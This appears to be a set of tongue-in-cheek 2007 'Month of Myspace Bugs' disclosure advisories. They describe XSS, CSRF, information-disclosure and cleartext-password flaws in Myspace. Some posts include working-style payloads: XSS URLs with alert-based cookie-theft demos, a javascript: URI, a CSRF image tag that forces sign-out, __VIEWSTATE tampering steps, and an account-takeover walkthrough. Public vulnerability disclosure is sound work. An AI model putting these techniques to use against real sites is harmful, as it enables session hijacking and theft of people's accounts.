momby cartel

MOMBY-00010100: Myspace Bug Potpourri

Advisory MOMBY-00010100: Myspace Bug Potpourri
Noobz: .*
LOLz: .*
0wnz: .*

Today is the last day of the Month of Myspace bugs. We disclsed 19 bugs this month, about 14 of which were fixed within a day or two of publication, which demonstrates two interesting facts: the Myspace web design and security groups can fix bugs if they care to, and b) the Myspace web design and security groups tend to fix bugs if they're presented in an easy to read and high profile "Month of" format.

Anyway, here's the rest of the submissions that we didn't get to, in glorious unedited plain text. That means that we do not offer any sort of advice on how to reproduce these, nor do we offer any sort of independant validation on the quality of the bugs, or even so much as a spellcheck.

Thanks to MustLive, rMrGvG, Awesome AnDrEw, RSnake, teh_commodore, Synthetic, and everyone else, credited or not, for submitting bugs. We, quite literally, wouldn't have done it without you! And also thanks to Six Apart and the wonderful staff at LiveJournal for taking this all in stride and not being giant dicks. Extra thanks for rMrGvG for translation for my favorite people on Earth, the Mighty Spaniards, originators of the deadlist flu bug ever seen!

Finally, thanks to the readers, especially the haters. You guys made us laugh, and laugh, and laugh. April Fools, suckers!

NEXT MONTH: MONTH OF NO MONTH OF BUGS


MOMBY-00010100a: Myspace Flag Overlay Spammer Trick

Credit: Technocrat

MOMBY-00010100b: Myspace Unprintable Password Permanent Account Control

Credit: Awesome AnDrEw

MOMBY-00010100c: Myspace Embedded Flash Javascript/ActionScript XSS

Credit: Lonewolf / OwnedSpace

MOMBY-00010100d: Myspace Profile Redirect

Credit: Tymm

MOMBY-00010100e: Myspace Permanent Message Archival

Credit: c

MOMBY-00010100f: Myspace MP3 theft

Credit: Spas

MOMBY-00010100g: Myspace Jobs Search Locale XSS

Credit: rMrGvG

MOMBY-00010100h: Myspace Groups HTML Element Injection

Credit: rMrGvG

MOMBY-00010100i: Myspace Profile HTML Element Injection

Credit: rMrGvG

MOMBY-00010100j: Myspace Bulletin HTML Insertion

Credit: rMrGvG

MOMBY-00010100k: Myspace Blog Background Image XSS

Credit: Paul_Smells aka Sinclair

MOMBY-00010100l: Myspace mp3downloader MP3 Theft

Credit: Jon

MOMBY-00010100m: Myspace mp3downloader MP3 Theft

Credit: Awesome AnDrEw

MOMBY-00010100n: Myspace Random Image Viewer

Credit: skinnyCorp

MOMBY-00010100o: Myspace Profile Reset

Credit: Anonymous

MOMBY-00010100p: Myspace Preferred Language Reset

Credit: Anonymous

MOMBY-00010100q: Myspace Domain Generalization Design Error

Credit: Wladimir

MOMBY-00010100r: Myspace Patched XSS

Credit: rMrGvG

MOMBY-00010100s: Myspace Shouthacking Vector

Credit: Anonymous

MOMBY-00010100t: Myspace CSS "@import" XSS

Credit: luoluo

MOMBY-00010100u: Myspace Messaging XSS

Credit: rMrGvG

MOMBY-00010100v: Myspace Messaging XSS

Credit: TX

MOMBY-00010100x: Myspace Instant Messenger Unfiltered Flash

Credit: Awesome AnDrEw

MOMBY-00010100y: G4TV Month Of Myspace Bugs Article XSS

Credit: Mondo Armando

MOMBY-00010100z: Unknown Myspace Vulnerability

Credit: Unknown

MOMBY-00010100!: Unproven Myspace Undeletable Comment

Credit: Anonymous

MOMBY-00010100@: Myspace Top Friends Bug

Credit: Anonymous

MOMBY-00010100#: Myspace MYUSERINFO Alteration (User Impersonation)

Credit: Anonymous

MOMBY-00010100$: Myspace Message Privilege Violation

Credit: Anonymous

MOMBY-00010100%: Myspace Vulnerable Feeling Form

Credit: Anonymous
momby cartel

MOMBY-00010011: Pimp-My-Profile "Hide Friends" Information Disclosure

Advisory MOMBY-00010011: Pimp-My-Profile "Hide Friends" Information Disclosure
Noobz: ***********
LOLz: ******
0wnz: *

Third party skinning service Pimp-My-Profile.com offers thousands of pre-designed Myspace profile styles (as well as misleading phishing links represented as eBay, for some reason). Most of these profile overlays can be "tweaked" to "hide" portions of Myspace profiles -- in particular, a "Hide Friends" button. The usual use of hiding friends is, in fact, a mistaken belief that a hidden friends pane removes the ability for attackers to learn who that user's friends are. For example, some users utilize the Pimp-My-Profile.com functionality to conceal "Cyber" romantic relationships from "Real Life" relationship partners, to hide "unprofessional" associatiations from potential employers, and other motives (this has been shown via first-hand anecdotal experience).

However, by viewing the user's personal information via the "viewfriends" application on friends.myspace.com, it is in fact trivial to learn such hidden relationships. An example is shown below.

howto: change 'profile' to 'friends' on the URL where indicated

Profile without friends
viewfriends profile (one friend)


It's worth stressing three features of this bug: 1) This is a third-party service presumably unrelated to MySpace. 2) Regardless, this bug affects the usability of the Myspace service -- if users were better informed of this information disclosure attack, they would not likely rely on the "Hide Friends" functionality to conceal relationships, and 3) This was in fact the bug that prompted the MOMBY Institute to pursue this ridiculous Month of Bugs.

Credit: This bug was first reported by Voodoo Woman, a confessed Myspace loser who enjoys stalking even the most casual of acquaintances on the Internet and compiling detailed dossiers of their lives and associations.

begin boring-rant.txt 644

When learning of this bug, we realized that there would be at least several thousand typical Myspace users who may be concerned about this sort information disclosure attack -- many more than would be concerned about a null pointer dereference, a local-only privilege escalation in Mac OSX, or a double-free in PHP4. While these other bugs, and even some XSS bugs detailed here at MOMBY, are more closely associated with information security, there is about zero common interest in these issues outside of a small, highly-trained circle of professional attackers and defenders. On the other hand, Myspace is simultaneously a common reference implementation of poor web application design, and one of the most popular and useful destinations in the history of the Internet. This is paradoxical to technical professionals, and the security set seems to be suffering a serious bout of cognitive dissonance on this point. Kids (12 to 24 year olds) are learning their Internet habits on Myspace -- that means cleartext authentication, random errors and re-logins, mysterious loss of data nad privileges, and easy XSS-enabled session hijacking are pretty much the sum total of their day-to-day experience.

We, as a defense industry and as a force for good, should be doing so much more to help them understand, even a little bit, what Good Security looks like. That's what MOMBY is all about.

Also, we really, really hate the other Months of Bugs, run by self-obsessed security douches all. And that is really what MOMBY is all about.

Also, we are ourselves self-obsessed security douches. And THAT is what MOMBY is all about.
momby cartel

MOMBY-00010010: Video Upload "title" Image Alt Text Error

Advisory MOMBY-00010010: Video Upload "title" Image Alt Text Error
Noobz: ******
LOLz: ***
0wnz: ?

Myspace allows users to upload video content to be aggregated and ultimately viewed by other Myspace users. Due to a problem in input validation on the "title" variable for the "metaForm" portion of the video upload application, it is possible for an attacker to cause input to be displayed outside the resulting alt parameter of the video's icon image.

Though this is certainly a bug, it appears that this is not exploitable by the feeble minds of the MOMBY! Cartel, due to the correct application of Myspace XSS filtering of common XSS elements, such as <script> tags, event handlers, style expression()s and the like. Also, most HTML elements are also correctly filtered. Perhaps the most interesting feature of this bug is that Myspace is clearly and correctly defending against the malicious leveraging of this bug, but still fails to correctly escape the "> sequence if provided by the user.

Screenshot: http://pics.livejournal.com/momby/pic/0000rqg1

Credit: rMrGvG of SNI-LABS first reported this bug. He reported it early on in MOMBY, so it's quite possible this was an exploitable condition then. Regardless, basic failure to escape user input is still a bug today.
  • Current Mood
    frustrated frustrated
  • Tags
momby cartel

MOMBY-00010001: Clickable "numberPagesBack" XSS

Advisory MOMBY-00010001: Clickable "numberPagesBack" XSS
Noobz: ****
LOLz: **
0wnz: **

The action handler for the "Email Customer Service" form at http://collect.myspace.com/index.cfm?fuseaction=misc.contactInput contains a clickable cross-site scripting (XSS) vulnerability. The resulting page from submitting a message builds its content from parameters collected from the URI. The two parameters of note are highlighted here (url broken for readability):

http://collect.myspace.com/index.cfm?page=none&emailAddress=[[ERROR
0000011c EMAIL ADDRESS NOT ENTERED]]
&fuseaction=misc.contactConfirm
&numberPagesBack=0);alert('cookie theft '%2bdocument.location);// (tiny)

Screenshot: http://pics.livejournal.com/momby/pic/0000pzyx

Similiar to MOMBY-1100, this link must be clicked by a victim in order to be effective for an attacker. Unlike MOMBY-1100, however, victims need not be authenticated, which lowers the relative value of the attack; victims are not guaranteed to possess useful session information. On the gripping hand, the attacker does have some freedom to alter the emailAddress parameter in order to further pursuade a victim to click on the presented "return to fix errors" link. For example, the attacker could present a false form for e-mailing Myspace customer service about something compelling, then intentionally alter the user's provided e-mail address with an engineered onSubmit() "hiccup" action immediately before loading the XSS-injected page. Victims, in turn, are more likely to believe the presented "results" does require them to reenter information.

Credit: This bug was first reported by Synthetic.

momby cartel

MOMBY-00010000: Myspace Cross-Site Request Forgery (CSRF) Signout

Advisory MOMBY-00010000: Myspace Cross-Site Request Forgery (CSRF) Signout
Noobz: ** 1/2
LOLz: *********
0wnz: * 1/2


Due to a lack of Referer checking or other form of validation, an attacker may arbitrarily cause Myspace users to end their sessions.

Ultimately, an attacker needs to get a user to visit the following URL to log off: http://collect.myspace.com/index.cfm?fuseaction=signout. However, due to the lack of origin checking, an attacker may cause a user to visit a link via any browser request, including background requests. Thus, for example, by setting a redirect action as a 404 error, an attacker may embed a non-existent image to trigger the session-ending GET action.

Example tag: A tag such as <img src="http://momby.phpnet.us/myspace/noimageforyou.jpg"> may be embedded throughout user-controlled areas, and may be targeted to particular users through blog comments, messages, etc.

It's important to note that automated log outs are not the only application of CSRFs.

Credit: AwEsOmE AnDrEw reported specifically the .htaccess-enabled attack in order to silently log out users, and earned a pile of extra LOLs thanks to this vector (to read the specific .htaccess syntax provided, see http://momby.phpnet.us/myspace/.htaccess).
momby cartel

MOMBY-110100100

Dude.

It's been 420 all day.

I had this really great bug to post. It was really funny. But damn if I didn't totally forget it.

Oop, Spongebob is on. Gotta go.

Dude.
  • Current Mood
    i think i'm feeling it
momby cartel

MOMBY-00001111: Myspace FriendsView.aspx "__VIEWSTATE" POST XSS

Advisory MOMBY-00001111: Myspace FriendsView.aspx "__VIEWSTATE" POST XSS
Noobz: **
LOLz: ****
0wnz: *** 1/2


An interesting find, this is an Ajax control present on all "View Friends" pages. Useful for POST-based XSS attacks (which will usually require a form posted off-site in order to trigger), this vulnerability will be exercised in a fashion similar to MOMBY-1001.

First, a simplified attack form for demo purposes:


This can of course be modified to be a one-click or onLoad submit action, requiring only the page to load in the victim's browser. Screenshot of the above form in action: http://pics.livejournal.com/momby/pic/0000hw8z

In order to modify the vulnerable parameter, some base64 encoding and decoding is required. This is easily accomplished with many b64 encoders, one of the easiest to use being the online encoder at http://www.motobit.com/util/base64-decoder-encoder.asp. An attacker may take the __VIEWSTATE value, decode and save the binary, and edit the section at offset 0xdb using his favorite hex editor. This is a standard TLV (type-length-value) node, which supplies the text displayed in the Friends header box, such as |05 10|Tom's Friends... (|05| being type, |10| being length decimal 16, the length of "Tom's Friends...")

Once that's complete, the attacker may re-encode the resulting file back to a single-line base64 format, and voila! An exploit that is not only completely unfiltered at Myspace.com, but is basically impossible to detect by any other means, such as third-party XSS-filtering proxies or browser add-ons (the stealth is worth at least a half an 0wn right there).

This form and its related Ajax cousins are a rich area of unfiltered exploitation, as it is not an obvious vector for most casual XSS bug-hunters. We here at M.O.M.B.Y! hope the original reporter will take a moment to explain further his methodology in finding this bug using the anonymous comment section of this journal.

Note, though, attackers are limited to 127 characters, as the length parameter is a signed single-byte integer. That's plenty of room for evil, though; recall that elements referenced from other sites (such as <script src="www.example.com/whatever.js">) are run in the same context as the originating page, so complex scripts need not be contained in the 127 byte limit.

Credit: Richtr first reported this bug. He also claims that forms such as these may be embeded in a personal profile Friends page, implying that this can be used to launch an XSS worm. We haven't tested this implementation.
momby cartel

MOMBY-00001110: Careless Myspace Credential Theft (And comedianJoin XSS)

MOMBY-00001110: Careless Myspace Credential Theft (And comedianJoin XSS)
by special guest advisory author, teh_commodore
n00bz: *******
LOLz: *******
0wnz: .0375

Just like all other bugs posted so far, this one relies on the user almost voluntarily revealing their authentication credentials. Troll livejournal accounts, and look for someone's authentication credentials. This may be in the form of a screenshot of some supposed hack or bug.

Screenshot: http://pics.livejournal.com/momby/pic/0000e7d1

From here, type in the user's credentials at myspace and there you have it. Sub-bug, Myspace doesn't send out an e-mail to the user when they go to change their password. You can do it all right there without any further intrusion necessary.

Screenshot: http://pics.livejournal.com/teh_commodore/pic/000049ct

Link: http://www.myspace.com/mombysux

This is the account set up by the MOMBY boys for their previous advisory. Don't believe me? Look here.

Screenshot Numero 00000010: http://pics.livejournal.com/teh_commodore/pic/00003z77

Unfortunately, once the user recovers his or her password, which will be the one you changed it to, they can regain control of their account. No worries though, if you can get to their e-mail account via the previous bug, you can change the e-mail account to which the myspace account is tied. This moves the 0wnz up to **.

To further specify the flaw, the real account hack comes with changing the e-mail address tied to the account you now have temporary control over. This changes temporary control to permanent, at least until the user gets the Myspace secret police involved (more on this later). To change the e-mail address, Myspace requires you to enter a randomly (?) generated code that was e-mailed to your current e-mail account.

Screenshots: http://pics.livejournal.com/teh_commodore/pic/00006h8h

http://pics.livejournal.com/teh_commodore/pic/00005qwh

If this is e-mail also intercepted, the attacker can now change the e-mail address of the account to their e-mail address. This means full account access and relatively-permanent control.

Now to the Myspace response to stolen accounts. In order to return control of someones account back to them, Myspace requires a "salute" from the person whose account was stolen. A salute is a picture of that person holding a sign with the friend ID on it.

I'm not clear what happens with the salute, or how it helps anything, but I do have a guess. The only thing that makes sense is if they plan to match the face in the "salute" to the pictures posted on the target account. If that's the case, then all one would have to do is delete all pictures of the target from the account. This is all speculation.

This is, of course, unless the changes are "obviously cruel/false," in which case Myspace at least suggests that they will move faster, and without the need of a "salute".

Point is, once an attacker has complete control of someones account, via linking the account to their e-mail instead of the original users, the entire process required for the user to regain control is very long and arduous. So an attacker could have the fake account for several days/weeks before anything is done.

Credit: Teh_Commodore.

MOMBY Addendum: Thanks for the excellent writeup, Teh_Commodore! Hope you don't mind that we mashed up the two posts together and altered the title a bit (yours was a little long). Since you went to all this effort to prove how lame we are, we felt that we should promote this to a proper journal entry. Again, thanks for your hard work! You showed us!

Bonus Bug: In addition to teh_commodore's bug, we'd like to also disclose a form-based XSS at http://signup.myspace.com/index.cfm?fuseaction=comedianJoin.step1verify, which is the POST action for the http://signup.myspace.com/index.cfm?fuseaction=comedianJoin web application. The "password" and "passwordConfirm" variables do not apply any filtering to HTML elements, including <script> tags. This is easily demonstrated by entering ">0wned as a password. Screenshot: http://pics.livejournal.com/momby/pic/0000fpb3. Credit for this goes to MustLive. Bonus 0wnz: +2 stars.
momby cartel

MOMBY-00001101: Cleartext Password Recovery via E-Mail

Advisory MOMBY-00001101: Cleartext Password Recovery via E-Mail
Press Embargo until April 17, 2007
Rankings:

Noobs: *****
 LOLs: **
 0wnz: ** 1/2

In MOMBY-111 we discussed the cleartext authentication via the web interface. So, perhaps it's unsurprising to find cleartext passwords being revealed in the e-mail generated when clicking the "Forgot your password?" link on http://www.myspace.com.

Screenshot: http://pics.livejournal.com/momby/pic/0000e7d1

Due to this implementation bug, parties in a position to intercept e-mail are also in a position to recover Myspace passwords.

One may argue that people who operate e-mail in a cleartext manner have more to worry about. But recall that anyone may trigger this cleartext password reveal; thus, an attacker who may watch cleartext e-mail exchanges (again, most commonly an eavesdropper who is listening on a public wireless segment) may induce a password revelation at will. He need not wait for his victim to login to Myspace, but may instead wait for the victim to download e-mail over a cleartext channel (such as Yahoo! webmail), which in this setting, may be considerably more often.

Also note, Fox Interactive does not inform Myspace users when their passwords have been revealed in this way. Thus, an attacker who has complete control over a mail account (such as an untrustworthy mail administrator or a government investigator), may induce the password reveal, intercept the message, then delete the message, without the victim's knowledge.

Credit: Dammit, now you know my awesum password!!!

momby cartel

Advisory MOMBY-00001100: Clickable "returnPath" XSS

Advisory MOMBY-00001100: Clickable "returnPath" XSS
Press Embargo until April 16, 2007
Rankings:

Noobs: ****
 LOLs: **
 0wnz: **

A pretty straight-forward XSS advisory for today. By supplying a user-defined value to the returnPath variable of the messageboard.posted application, attackers may supply a clickable javascript (or apparently any other protocol handler) URI.

The challenge is to make this useful for an attacker. This would likely involve some measure of social engineering to convince the victim to actually click on the "Back to Forum" link. Alternatively, an attacker could take advantage of an origin violation browser bug to automatically click on the link on the user's behalf.

Example link: http://forum.myspace.com/index.cfm?fuseaction=messageboard.posted
&returnPath=javascript:alert('aw%20yeah%20thx%Synthetic!');
(tiny)

Unlike most of our other XSS advisories, this link will only work correctly if the victim is already logged in; thus, a cookie-stealing attack, in this case, is guaranteed to have immediately usable results.

Screenshot: http://pics.livejournal.com/momby/pic/0000d19t

Credit: Synthetic, who upon reflection has decided that listing a Myspace page as a contact point in a Myspace security advisory may not have been the wisest decision.